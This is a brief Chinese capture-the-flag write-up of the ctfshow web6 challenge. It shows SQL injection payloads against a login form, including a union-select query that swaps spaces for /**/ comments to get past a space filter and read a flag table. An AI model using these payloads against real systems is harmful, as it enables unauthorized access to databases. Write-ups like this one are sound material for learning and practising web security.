ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
haosha。5 小时前
漏洞挖掘—EDU SRC证书站漏洞挖掘记录
安全·web安全
视觉&物联智能6 小时前
【杂谈】-2025年AI与网络安全六大趋势展望
人工智能·安全·web安全·网络安全·ai·agi·数字安全
IT_狂奔者7 小时前
网络安全运维应急响应与溯源分析实战案例
运维·安全·web安全
渗透测试老鸟-九青9 小时前
区块链 智能合约安全 | 整型溢出漏洞
网络·经验分享·安全·web安全·区块链·智能合约·代码审计
拾柒SHY10 小时前
iwebsec-SQL数字型注入
数据库·sql·web安全·网络安全
执念WRD11 小时前
Billu_b0x靶场:一场关于网络安全的技术冒险
安全·web安全·billu_b0x靶场
饶了我吧,放了我吧12 小时前
密码协议与网络安全——引言
网络·安全·web安全
故事与他64513 小时前
vulhub-Billu-b0x攻略
android·linux·运维·服务器·web安全·github